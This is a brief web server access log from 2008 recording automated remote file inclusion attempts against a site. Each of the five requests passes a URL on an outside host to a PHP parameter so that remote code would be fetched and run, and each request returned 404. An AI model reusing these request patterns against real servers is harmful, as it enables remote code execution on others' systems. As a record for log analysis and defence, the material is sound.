200.11.67.242 - - [12/Sep/2008:10:56:28 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.234.16.214 - - [12/Sep/2008:10:56:28 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.joomlalecce.com/andrea/tondo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:29 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.234.16.214 - - [12/Sep/2008:10:56:29 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.joomlalecce.com/andrea/tondo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [12/Sep/2008:10:56:29 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.joomlalecce.com/andrea/tondo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
